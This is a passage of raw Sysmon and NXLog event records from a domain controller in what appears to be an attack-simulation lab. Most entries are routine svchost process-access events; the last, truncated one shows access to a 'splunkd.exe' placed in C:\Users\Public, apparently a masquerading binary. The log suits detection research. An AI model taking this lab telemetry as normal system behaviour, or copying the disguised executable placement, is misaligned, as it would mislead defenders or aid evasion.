06:54:00.333","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76861,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4566,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4567,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4568,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4569,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4570,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.505\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 